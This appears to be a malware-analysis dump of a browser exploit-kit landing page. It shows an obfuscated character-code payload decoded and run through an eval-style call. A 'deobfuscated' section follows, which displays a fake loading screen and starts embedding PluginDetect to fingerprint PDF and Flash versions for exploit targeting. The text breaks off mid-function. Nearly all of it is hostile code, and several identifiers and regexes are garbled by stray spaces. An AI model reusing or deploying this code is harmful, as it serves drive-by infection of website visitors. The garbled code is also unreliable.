eq#wy#q#ci#r#ci#q#yw#cq#qu#ye#yp#cw#tu#cq#iq#tt#qo#yw#r#ur#yo#rq#ur#uw#ye#yi#yq#cw#cq#qu#ty#uw#to#tt#yt#ie#ie#ye#yp#cw#co#tu#cq#iq#tu#qo#yq#r#yq#to#ur#we#ry#eu#cw#yr#r#up#uw#yo#yq#eq#wy#cq#ie#ye#yp#cw#tt#qo#qo#ci#qw#ci#cq#iq#ur#uw#uo#iq#tu#r#we#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#qo#ci#tt#yy#uu#tt#uo#ue#ci#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#uw#to#ur#ut#uw#yi#ci#qw#w#y#w#i#u#w#y#ci#ie#ie#ur#uw#uo#iq#yy#qo#ty#cw#tu#r#wo#to#ur#rr#tt#uw#ye#tt#ty#yy#to#cw#ci#cy#uy#to#uw#ue#ye#yo#yi#ci#cq#cq#ie#tu#tt#ur#tu#yw#cw#yt#cq#iq#ie#ye#yp#cw#co#yy#cr#cr#tt#cq#iq#yy#qo#tt#ie#ie#yr#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yy#wq#u#qy#e#u#qu#yr#r#uy#to#uw#ue#ye#yo#yi#qo#yq#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#yy#cq#qu#uw#to#ur#ut#uw#yi#cqp#ur#uw#ut#to#ie#ie#w#tt#ti#yo#ty#to#uw#to#tt#ti#to#uw#qy#iq#yu#ye#yu#to#rw#uo#up#to#qy#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#up#ti#yp#ci#w#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#qy#yi#ut#yy#yy#w#up#uw#yo#yq#eq#wy#qy#ro#ci#we#tu#uw#yo#ei#wy#wi#r#ei#wy#wi#ci#w#ci#ei#wy#wi#r#ei#ti#yp#wt#ur#uw#yy#ci#tq#w#tu#yy#tt#ue#ue#eq#wy#qy#ci#tu#yy#ue#ye#ti#qy#wt#we#qr#we#qt#qe#qr#y#e#i#qr#y#wy#e#u#u#wt#wi#e#we#i#qp#wy#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ci#w#eq#ey#rq#rw#we#er#er#wu#wy#qy#iq#ie#w#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#ti#w#tu#w#yp#cq#iq#uy#tt#uw#cqp#ty#qo#ur#yw#ye#ue#w#to#qo#ty#r#cy#w#tt#qu#yp#yo#uw#cw#tt#cqp#ye#yi#cqp#ti#cq#iq#ye#yp#cw#ti#ro#tt#tq#cr#cr#ti#ro#tt#tq#r#ur#uo#up#to#cr#cr#ti#ro#tt#tq#r#ur#uo#up#to#qo#qo#tu#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#ie#ye#yp#cw#to#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cw#tu#w#yp#cq#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#ie#uw#to#ur#ut#uw#yi#cqp#y#ie#w#yq#to#ur#rr#to#uw#ue#ye#yo#yi#qy#yp#ut#yi#tu#ur#ye#yo#yi#cw#yy#w#yr#cq#iq#uy#tt#uw#cqp#yq#qo#ur#yw#ye#ue#w#ti#qo#yq#r#cy#w#ye#w#yp#w#yu#w#yi#w#ty#qo#yi#ut#yy#yy#w#yw#qo#yi#ut#yy#yy#w#yt#qo#yq#r#yu#ye#yu#to#rw#uo#up#to#w#tt#w#tu#qu#ye#yp#cw#ti#r#ye#ue#rq#ur#uw#ye#yi#yq#cw#yr#cq#cq#iq#yr#qo#yr#r#uw#to#up#yy#tt#tu#to#cw#t#tp#ue#t#yq#w#ci#ci#cq#qu#ye#yp#cw#yr#cq#iq#yt#qo#yr#ie#ie#to#yy#ue#to#iq#yr#qo#yi#ut#yy#yy#ie#ye#yp#cw#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#cq#cq#iq#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#qu#uw#to#ur#ut#uw#yi#ie#ye#yp#cw#co#ti#r#ye#ue#eq#wu#cq#iq#tt#qo#ci#we#ti#yo#ty#to#r#p#ei#wy#wi#r#p#ei#yy#ut#yq#e#wq#ye#yi#iw#we#ti#yo#ty#to#r#p#we#tu#uw#yo#ty#tt#ur#r#p#ei#yy#ut#yq#e#wq#ye#yi#iw#we#ti#yo#ty#to#r#p#rp#to#tt#ti#to#uw#r#p#ei#yy#ut#yq#e#wq#ye#yi#ci#qu#ye#yp#cw#yq#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#co#qo#qo#y#cq#iq#yq#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#wy#yo#yi#to#qo#y#qu#ty#qo#ti#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cw#yq#r#yu#ye#yu#to#rw#uo#up#to#w#tt#cq#qu#ye#yp#cw#co#yr#cq#iq#yi#qo#ty#ie#ye#yp#cw#co#ty#cr#cr#ti#r#yw#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#yq#r#yu#ye#yu#to#rw#uo#up#to#cq#cq#iq#ty#qo#ti#r#yp#ye#yi#ti#ey#tt#uy#ei#yy#ut#yq#ye#yi#cw#tt#w#y#cq#ie#ye#yp#cw#ty#cq#iq#yq#r#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#qo#ty#qu#yw#qo#ti#r#yq#to#ur#ey#ut#yu#cw#ty#r#ti#to#ue#tu#uw#ye#up#ur#ye#yo#yi#cq#iw#iw#ti#r#yq#to#ur#ey#ut#yu#cw#ty#r#yi#tt#yu#to#cq#qu#yw#qo#ti#r#yq#to#ur#ei#yy#ut#yq#ye#yi#wi#ye#yy#to#rr#to#uw#ue#ye#yo#yi#cw#ty#w#yw#cq#qu#ye#yp#cw#co#yw#cr#cr#ti#r#eu#rq#qo#qo#u#cq#iq#ye#yp#cw#yq#r#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#ty#w#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#uy#yi#ti#r#tt#ti#yo#ty#to#r#up#ti#yp#ui#yu#yy#ci#w#tt#cq#cq#iq#yw#qo#ci#qt#ci#ie#to#yy#ue#to#iq#ye#yp#cw#yq#r#up#yy#ut#yq#ye#yi#ep#tt#ue#et#ye#yu#to#rw#uo#up#to#cw#ty#w#ci#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#uy#yi#ti#r#tt#ti#yo#ty#to#r#ui#e#yu#tt#uw#ue#ci#w#tt#cq#cq#iq#yw#qo#ci#qr#ci#ie#ie#ie#ie#ie#to#yy#ue#to#iq#yw#qo#yq#r#uy#to#uw#ue#ye#yo#yi#ie#ye#yp#cw#co#ti#r#ye#ue#wy#to#yp#ye#yi#to#ti#cw#yi#cq#cq#iq#yi#qo#ti#r#yq#to#ur#et#ye#yu#to#wu#yi#tt#ty#yy#to#ti#ei#yy#ut#yq#ye#yi#cw#yt#w#tt#cq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yi#cr#cr#yw#wq#u#qy#cw#yi#wq#y#qy#cw#yq#r#yi#tt#uy#ei#yy#ut#yq#ye#yi#eu#ty#yr#wq#e#y#r#i#qy#e#u#cq#cq#ie#to#yy#ue#to#iq#ty#qo#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#y#tq#cq#iw#iw#ti#r#yq#to#ur#we#ry#eu#cw#yq#r#up#uw#yo#yq#eq#wy#ro#u#tq#cq#qu#tu#qo#t#qo#tp#ue#p#cw#ro#tp#ti#tp#r#tq#q#cq#t#yq#qu#ur#uw#uo#iq#yp#qo#cw#ty#iw#iw#ti#r#yq#to#ur#wy#eu#et#yo#ty#yr#cw#ti#r#ye#yi#ue#to#uw#ur#ep#rw#et#er#cw#ci#yo#ty#yr#to#tu#ur#ci#w#ro#ci#tu#yy#tt#ue#ue#ye#ti#ci#w#yq#r#tu#yy#tt#ue#ue#eq#wy#tq#w#ro#ci#ue#uw#tu#ci#w#ci#ci#tq#w#ci#ci#w#yq#cq#cq#cq#r#wo#to#ur#rr#to#uw#ue#ye#yo#yi#ue#cw#cq#qu#yp#yo#uw#cw#yu#qo#y#qu#yu#qi#qq#qu#yu#q#q#cq#iq#ye#yp#cw#tu#r#ur#to#ue#ur#cw#yp#cq#cr#cr#cw#co#yw#iw#iw#rp#to#yq#wu#ui#up#r#cy#u#wp#yw#cq#cq#iq#yw#qo#rp#to#yq#wu#ui#up#r#cy#u#ie#ie#ie#tu#tt#ur#tu#yw#cw#ye#cq#iq#ie#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#qo#yw#wq#u#qy#cw#ty#wq#y#qy#e#u#cq#ie#ye#yp#cw#co#yq#r#uy#to#uw#ue#ye#yo#yi#cq#iq#yq#r#uy#to#uw#ue#ye#yo#yi#qo#ti#r#yp#yo#uw#yu#tt#ur#ey#ut#yu#cw#yw#cq#ie#yq#r#eq#ey#rq#rw#we#er#er#wu#wy#ro#yt#tq#qo#yq#r#ye#yi#ue#ur#tt#yy#yy#to#ti#ie#ie#w#ip#ip#qy#y#ie#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#ye#yi#ye#ur#rq#tu#uw#ye#up#ur#cw#cq#qu#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#r#ci#cq#qu#up#ti#yp#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ci#we#ti#yo#ty#to#rp#to#tt#ti#to#uw#ci#cq#qu#yp#yy#tt#ue#yw#uy#to#uw#qo#ei#yy#ut#yq#ye#yi#wy#to#ur#to#tu#ur#r#yq#to#ur#rr#to#uw#ue#ye#yo#yi#cw#ce#wi#yy#tt#ue#yw#ce#cq#qu#ie#tu#tt#ur#tu#yw#cw#to#cq#iq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#up#ti#yp#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#up#ti#yp#uy#to#uw#qo#up#ti#yp#uy#to#uw#r#ue#up#yy#ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#up#ti#yp#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#ye#yp#cw#ur#uo#up#to#yo#yp#cqp#yp#yy#tt#ue#yw#uy#to#uw#qo#qo#ce#ue#ur#uw#ye#yi#yq#ce#cq#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#yp#yy#tt#ue#yw#uy#to#uw#r#ue#up#yy#ye#ur#cw#ce#r#ce#cq#ie#to#yy#ue#to#iq#yp#yy#tt#ue#yw#uy#to#uw#qo#ro#y#w#y#w#y#w#y#tq#ie#qu#to#ui#to#tu#qe#qo#u#qu#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#y#cw#cq#iq#ue#up#yy#i#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#i#cw#cq#iq#ue#up#yy#o#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#o#cw#cq#iq#ue#up#yy#qp#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qp#cw#cq#iq#ue#up#yy#qq#cw#cq#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wt#ey#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#ce#tu#yo#yi#ur#to#yi#ur#t#ue#tu#yo#uw#to#r#ue#uu#yp#ce#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wr#yy#yo#tu#yt#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#rq#ye#ip#to#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#u#y#i#qp#cqp#p#cqp#u#y#i#qp#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#we#yy#yy#yo#tu#wt#yo#ut#yi#ur#cw#cq#iq#uw#to#ur#ut#uw#yi#cqp#o#y#y#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#wi#ye#yy#yy#wr#uo#ur#to#ue#cw#cq#iq#uy#tt#uw#cqp#tt#qo#ce#ct#ut#ce#q#ce#y#tu#y#tu#ce#qu#uw#to#ur#ut#uw#yi#cqp#tt#q#tt#qu#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#yq#to#ur#rq#yw#to#yy#yy#wt#yo#ti#to#cw#cq#iq#ye#yp#cw#u#cq#iq#uw#to#ur#ut#uw#yi#cqp#ci#ct#ut#qp#u#qp#u#ct#ut#qp#u#qp#u#ct#ut#qr#o#qw#qw#ct#ut#yp#tu#to#qp#ct#ut#to#ty#yp#tu#ct#ut#qq#qr#u#y#ct#ut#tu#qt#o#u#ct#ut#qr#u#qw#qw#ct#ut#qq#qp#to#qt#ct#ut#qr#y#yp#to#ct#ut#i#qr#o#y#ct#ut#to#i#qp#y#ct#ut#to#ty#yp#tt#ct#ut#to#qr#y#qq#ct#ut#yp#yp#to#ty#ct#ut#yp#yp#yp#yp#ct#ut#tu#tu#tt#ti#ct#ut#u#tu#qq#ti#ct#ut#qe#qe#tu#u#ct#ut#to#qr#u#ty#ct#ut#tt#o#qp#tu#ct#ut#u#qr#qw#qr#ct#ut#qw#qr#tt#o#ct#ut#tt#o#i#qp#ct#ut#o#qp#qq#qr#ct#ut#tt#o#qe#to#ct#ut#i#y#qq#to#ct#ut#yp#o#u#ty#ct#ut#tt#o#qp#to#ct#ut#u#qp#qe#qw#ct#ut#qq#tu#i#ty#ct#ut#y#qp#u#ty#ct#ut#tu#qw#tt#qt#ct#ut#o#qr#o#ti#ct#ut#ti#qe#ti#qe#ct#ut#tt#o#qt#y#ct#ut#u#qr#qw#qr#ct#ut#qw#to#to#ty#ct#ut#i#to#u#u#ct#ut#ti#o#qq#ti#ct#ut#u#tu#tt#yp#ct#ut#tt#ti#y#tu#ct#ut#qq#ti#tu#tu#ct#ut#tu#u#qe#qt#ct#ut#qw#qp#tu#o#ct#ut#qe#to#qe#qt#ct#ut#qq#ti#tt#o#ct#ut#tt#o#u#qp#ct#ut#u#ti#qq#tu#ct#ut#i#ty#qq#y#ct#ut#qe#to#ti#ti#ct#ut#qq#to#tt#o#ct#ut#i#ty#y#qr#ct#ut#u#ty#ti#ti#ct#ut#qw#u#to#u#ct#ut#ti#qp#qw#qt#ct#ut#i#ty#qr#qq#ct#ut#u#ty#to#ti#ct#ut#i#qe#yp#o#ct#ut#o#qr#qt#qw#ct#ut#ti#tt#u#y#ct#ut#i#y#qq#tu#ct#ut#to#o#to#qt#ct#ut#i#ty#i#qq#ct#ut#qw#qr#yp#i#ct#ut#ti#qt#tu#o#ct#ut#o#qe#u#o#ct#ut#tu#to#qq#ti#ct#ut#tt#o#qe#qw#ct#ut#y#tu#qe#qw#ct#ut#yp#qq#i#ty#ct#ut#tt#o#qp#to#ct#ut#qw#o#i#qp#ct#ut#qw#to#tt#qq#ct#ut#ti#qe#tu#qp#ct#ut#y#tu#qe#tu#ct#ut#tt#o#i#qp#ct#ut#i#ty#yp#y#ct#ut#tt#o#yp#qq#ct#ut#tt#o#i#tu#ct#ut#to#ti#i#ty#ct#ut#qe#qw#qr#o#ct#ut#to#ty#qe#u#ct#ut#qe#ty#tu#o#ct#ut#tt#o#qr#qq#ct#ut#y#qr#qp#y#ct#ut#qq#qq#tt#qr#ct#ut#u#ty#i#qp#ct#ut#i#ty#qq#tu#ct#ut#tu#o#ty#to#ct#ut#tt#o#ti#ty#ct#ut#i#y#qp#y#ct#ut#ti#yp#tt#o#ct#ut#i#ti#qp#i#ct#ut#tu#y#qe#u#ct#ut#ti#qe#ty#y#ct#ut#ti#qe#ti#qe#ct#ut#ti#u#tu#tt#ct#ut#i#qr#tu#y#ct#ut#i#qr#i#qr#ct#ut#qe#y#i#qr#ct#ut#qp#i#qe#qr#ct#ut#qp#y#qw#qr#ct#ut#i#qr#ti#qe#ct#ut#i#qr#i#qr#ct#ut#tt#ty#qe#qr#ct#ut#o#u#to#qr#ct#ut#qe#ti#qe#qr#ct#ut#tu#qp#tt#o#ct#ut#qe#qw#tt#o#ct#ut#tt#ty#o#qr#ct#ut#i#ti#to#ty#ct#ut#tu#ty#ti#qe#ct#ut#qp#qe#qp#y#ct#ut#i#qr#qp#qw#ct#ut#qp#y#i#qr#ct#ut#qq#tt#qq#ti#ct#ut#qp#qq#qp#qp#ct#ut#ti#qe#qe#tu#ct#ut#tt#ty#o#to#ct#ut#i#y#to#tu#ct#ut#tu#y#tt#o#ct#ut#qp#qt#tu#y#ct#ut#ti#qe#ti#qe#ct#ut#tu#o#ti#qe#ct#ut#tu#o#i#tt#ct#ut#tt#qt#qq#tt#ct#ut#i#tu#tu#qp#ct#ut#i#qr#i#qt#ct#ut#tt#qq#i#qr#ct#ut#y#tu#qe#qp#ct#ut#to#yp#i#qp#ct#ut#y#tu#i#tu#ct#ut#qp#ti#qq#tt#ct#ut#qq#ty#qp#yp#ct#ut#qw#tu#to#yp#ct#ut#i#tu#y#tu#ct#ut#qq#tt#qq#to#ct#ut#u#tt#u#ty#ct#ut#qw#tu#to#yp#ct#ut#i#y#y#tu#ct#ut#y#qq#y#qr#ct#ut#y#qr#qq#ty#ct#ut#qp#y#qe#ty#ct#ut#i#qr#ti#y#ct#ut#i#qr#i#qr#ct#ut#qe#to#ti#qe#ct#ut#tt#o#i#qp#ct#ut#u#ty#tu#y#ct#ut#qe#qt#to#u#ct#ut#qw#tu#to#yp#ct#ut#i#qr#o#qq#ct#ut#qq#qr#qq#yp#ct#ut#qq#tu#qp#tt#ct#ut#qw#tu#to#yp#ct#ut#i#ti#o#qq#ct#ut#qp#tu#y#qw#ct#ut#qp#qp#qp#qp#ct#ut#qw#tu#to#to#ct#ut#i#u#o#qq#ct#ut#qe#u#i#qr#ct#ut#to#qt#tt#i#ct#ut#u#qr#i#tu#ct#ut#qw#tu#tt#y#ct#ut#i#tu#o#qq#ct#ut#qe#qt#qw#qt#ct#ut#i#qr#qp#i#ct#ut#i#qr#qp#i#ct#ut#qe#yp#qe#ty#ct#ut#i#qr#qp#i#ct#ut#qe#to#ti#qe#ct#ut#tt#ti#o#tu#ct#ut#qq#ti#to#qr#ct#ut#qp#i#o#to#ct#ut#qe#ty#i#qr#ct#ut#qe#to#ti#qe#ct#ut#qp#i#i#tu#ct#ut#tt#ty#i#qr#ct#ut#i#qp#tu#o#ct#ut#ti#qe#qe#ty#ct#ut#i#tu#qe#to#ct#ut#to#ty#tt#ty#ct#ut#tu#o#i#qp#ct#ut#tu#o#i#tt#ct#ut#qw#yp#o#ty#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qw#yp#ti#i#ct#ut#u#qe#tt#qr#ct#ut#qq#ti#i#qr#ct#ut#qp#i#to#tu#ct#ut#qp#i#i#qr#ct#ut#ti#qe#ti#qw#ct#ut#i#y#qe#to#ct#ut#ty#qp#tu#y#ct#ut#ti#qe#ti#qw#ct#ut#tt#qw#ti#qe#ct#ut#i#qw#qw#qw#ct#ut#ty#y#tu#qp#ct#ut#tt#i#ti#qw#ct#ut#tt#u#i#qw#ct#ut#i#qt#qp#qe#ct#ut#u#ty#qt#qq#ct#ut#tt#i#to#i#ct#ut#o#o#qe#o#ct#ut#qw#to#to#to#ct#ut#u#to#qq#u#ct#ut#y#qe#o#i#ct#ut#qp#y#qq#qr#ct#ut#qq#tu#qq#tu#ct#ut#u#i#qq#qr#ct#ut#y#qe#y#qe#ct#ut#qq#yp#qq#tu#ct#ut#qq#ty#qp#u#ct#ut#qp#ti#qq#tu#ct#ut#qq#tu#qp#tu#ct#ut#qq#tt#qp#qt#ct#ut#qq#ty#qq#tu#ct#ut#qp#qw#y#qw#ct#ut#qq#tu#qp#ti#ct#ut#qq#yp#y#qe#ct#ut#qq#qr#y#qw#ct#ut#qq#qr#qp#y#ct#ut#qp#to#u#qe#ct#ut#u#qt#u#qq#ct#ut#u#ty#qp#tt#ct#ut#u#yp#u#ty#ct#ut#qp#ti#y#to#ct#ut#u#qt#u#qq#ct#ut#i#qr#i#qr#ci#qu#ie#ie#yp#ut#yi#tu#ur#ye#yo#yi#cqp#ue#up#yy#qq#cw#cq#iq#uy#tt#uw#cqp#uy#to#uw#u#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#y#tq#qu#uy#tt#uw#cqp#uy#to#uw#i#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#u#tq#qu#uy#tt#uw#cqp#uy#to#uw#o#qo#yp#yy#tt#ue#yw#uy#to#uw#ro#i#tq#qu#ye#yp#cqp#cw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#y#cr#cr#uy#to#uw#o#wp#qp#y#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#wp#y#cq#cr#cr#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iw#iw#cw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qo#qo#i#cr#cr#uy#to#uw#o#qi#u#qq#qt#cq#iw#iw#cw#uy#to#uw#u#qo#qo#u#y#cr#cr#uy#to#uw#i#qi#i#cq#cq#cq#iq#uy#tt#uw#cqp#yp#yi#tt#yu#to#qo#ci#tu#yo#yi#ur#to#yi#ur#t#yp#ye#to#yy#ti#ci#qu#uy#tt#uw#cqp#wi#yy#tt#ue#yw#te#yo#ty#yr#qo#ci#qi#yo#ty#yr#to#tu#ur#cqp#tu#yy#tt#ue#ue#ye#ti#qo#ce#tu#yy#ue#ye#ti#qy#ti#i#qe#tu#ti#ty#qw#to#e#tt#to#qw#ti#e#u#u#tu#yp#e#qt#qw#ty#qr#e#qp#qp#qp#qq#qq#o#qq#qp#y#y#y#y#ce#cqp#uu#ye#ti#ur#yw#qo#u#y#cqp#yw#to#ye#yq#yw#ur#qo#u#y#cqp#ye#ti#qo#ce#ue#uu#yp#te#ye#ti#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#yu#yo#uy#ye#to#ce#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#t#wp#ci#qu#tt#yy#qo#ci#tt#yy#uu#tt#uo#ue#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#tp#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#tp#ci#cqp#uy#tt#yy#ut#to#qo#ce#ci#q#tt#yy#q#ci#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#up#tt#uw#tt#yu#cqp#yi#tt#yu#to#qo#ce#ei#yy#tt#uo#ce#cqp#uy#tt#yy#ut#to#qo#ce#y#ce#cqp#t#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#to#yu#ty#to#ti#cqp#ue#uw#tu#qo#ce#ci#q#yp#yi#tt#yu#to#q#ci#r#ue#uu#yp#ce#cqp#ye#ti#qo#ce#ue#uu#yp#te#ye#ti#ce#cqp#yi#tt#yu#to#qo#ce#ue#uu#yp#te#ye#ti#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#tt#yy#yy#yo#uu#rq#tu#uw#ye#up#ur#we#tu#tu#to#ue#ue#qo#ce#ci#q#tt#yy#q#ci#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#ur#uo#up#to#qo#ce#tt#up#up#yy#ye#tu#tt#ur#ye#yo#yi#t#ui#e#ue#yw#yo#tu#yt#uu#tt#uy#to#e#yp#yy#tt#ue#yw#ce#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#uu#ye#ti#ur#yw#qo#ce#u#y#ce#cqp#yw#to#ye#yq#yw#ur#qo#ce#u#y#ce#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#to#yu#ty#to#ti#wp#ci#qu#wi#yy#tt#ue#yw#te#yo#ty#yr#q#qo#ci#qi#t#yo#ty#yr#to#tu#ur#wp#ci#qu#uy#tt#uw#cqp#yo#rq#up#tt#yi#qo#ti#yo#tu#ut#yu#to#yi#ur#r#tu#uw#to#tt#ur#to#wu#yy#to#yu#to#yi#ur#cw#ci#ue#up#tt#yi#ci#cq#qu#ti#yo#tu#ut#yu#to#yi#ur#r#ty#yo#ti#uo#r#tt#up#up#to#yi#ti#wt#yw#ye#yy#ti#cw#yo#rq#up#tt#yi#cq#qu#yo#rq#up#tt#yi#r#ye#yi#yi#to#uw#ep#rw#et#er#qo#wi#yy#tt#ue#yw#te#yo#ty#yr#qu#ie#ue#to#ur#rw#ye#yu#to#yo#ut#ur#cw#to#yi#ti#te#uw#to#ti#ye#uw#to#tu#ur#w#qr#y#y#y#cq#qu#ie#ue#up#yy#y#cw#cq#qu";
try{new btoa(12);}catch(qqq){r+="eplace";}
a=a[r](/q/g,"1");
a=a[r](/w/g,"2");
a=a[r](/e/g,"3");
a=a[r](/r/g,"4");
a=a[r](/t/g,"5");
a=a[r](/y/g,"6");
a=a[r](/u/g,"7");
a=a[r](/i/g,"8");
a=a[r](/o/g,"9");
a=a[r](/p/g,"0");
a=a[r](/c/g,"-");
}
a=a.split("#");
md='a';
c=[];
i=0;
p=parseInt;
try{new window(123).typ;}catch(qqq){qq=String;}
try{new btoa(12);}catch(qqq){fr="ode";}
try{new btoa(12);}catch(qqq){qq2=e("qq.fromCharCode");}
if(aaa==aa){
while(15062>i){
vv=a[i];
r2=cc=qq2(40+2+1*vv);
r=c;
if(fr)c=r+r2;
i=i+1;
}
w=e;
w(c);
}
*/
</script></body></html> */
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------------------------------------------------ */
/* ------------- Deobfuscated Code Below ---------------- */
/* ------------------------------------------------------ */
document.write('<center><h1>Please wait while loading...</h1><img src="loading_animation.gif" alt="loading content animation"><br><br><hr><p>We processing your request, please be patient for a while.</p></center><hr>');
function end_redirect() {
window.location.href = '/welcome.php';
}
var pdfver = [0, 0, 0, 0],
flashver = [0, 0, 0, 0];
try {
var PluginDetect = {
version: "0.7.6",
name: "PluginDetect",
handler: function (c, b, a) {
return function () {
c(b, a)
}
},
isDefined: function (b) {
return typeof b != "undefined"
},
isArray: function (b) {
return(/array/i).test(Object.prototype.toString.call(b))
},
isFunc: function (b) {
return typeof b == "function"
},
isString: function (b) {
return typeof b == "string"
},
isNum: function (b) {
return typeof b == "number"
},
isStrNum: function (b) {
return(typeof b == "string" && (/\d/).test(b))
},
getNumRegx: / [ \ d][ \ d \ . \ _ ,- ] */,
splitNumRegx: / [ \ . \ _ ,- ]/g,
getNum: function (b, c) {
var d = this,
a = d.isStrNum(b) ? (d.isDefined(c) ? new RegExp(c) : d.getNumR egx).exec(b) : null;
return a ? a[0] : null
},
compareNums: function (h, f, d) {
var e = this,
c, b, a, g = parse Int;
if(e.isStrNum(h) && e.isStrNum(f)) {
if(e.isDefined(d) && d.compareNums) {
return d.compareNums(h, f)
}
c = h.split(e.splitNumRegx);
b = f.split(e.splitNumRegx);
for(a = 0; a < Math.min(c.length, b.l ength); a++) {
if(g(c[a], 10) > g(b[a], 10)) {
return 1
}
if(g(c[a], 10) < g(b[a], 10)) {
return -1
}
}
}
return 0
},
formatNum: function (b, c) {
var d = this,
a, e;
if(!d.isStrNum(b)) {
return null
}
if(!d.isNum(c)) {
c = 4
}
c--;
e = b.replace(/ \ s/g, "").split(d.splitNumRegx).concat(["0", "0", "0", "0"]);
for(a = 0; a < 4; a++) {
if(/ ^ (0 +)(. + )$/.test(e[a])) {
e[a] = RegExp.$2
}
if(a > c || !(/ \ d/).test(e[a])) {
e[a] = "0"
}
}
return e.slice(0, 4).join(",")
},
$$hasMimeType: function (a) {
return function (d) {
if(!a.isIE && d) {
var c, b, e, f = a.isString(d) ? [d] : d;
if(!f || !f.length) {
return null
}
for(e = 0; e < f.length; e++) {
if(/[ ^\ s]/.test(f[e]) && (c = navigator.mimeTypes[f[e]]) && (b = c.enabledPlugin) && (b.name || b.description)) {
return c
}
}
}
return null
}
},
findNavPlugin: function (l, e, c) {
var j = this,
h = new RegExp(l, "i"),
d = (!j.isDefined(e) || e) ? / \ d/ : 0,
k = c ? new RegExp(c, "i") : 0,
a = navigator.plugins,
g = "",
f, b, m;
for(f = 0; f < a.length; f++) {
m = a[f].description || g;
b = a[f].name || g;
